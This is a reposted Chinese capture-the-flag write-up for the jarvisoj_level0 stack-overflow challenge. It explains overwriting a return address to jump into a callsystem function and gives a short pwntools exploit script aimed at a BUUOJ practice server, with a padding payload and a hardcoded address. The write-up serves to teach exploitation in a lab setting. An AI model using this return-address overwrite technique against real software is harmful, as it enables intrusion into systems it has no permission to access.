欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

PWN练习 栈溢出

程序员文章站 2024-01-20 09:40:52
...

jarvisoj_level0

关键字 easy 栈溢出

PWN练习 栈溢出

首先checksec 发现只开启NX保护,拖入ida

main函数
PWN练习 栈溢出
callsystem函数
PWN练习 栈溢出
漏洞函数
PWN练习 栈溢出

解题思路

最基础的栈利用,根据覆盖调用函数时压栈的返回地址,执行系统函数调用。

EXP

from pwn import *
sh=remote("node3.buuoj.cn","29865")
data=str("a"*0x88)+(p64(0x400596)) #此为callsystem地址
sh.sendline(data)
sh.interactive()
sh.close()
相关标签: PWN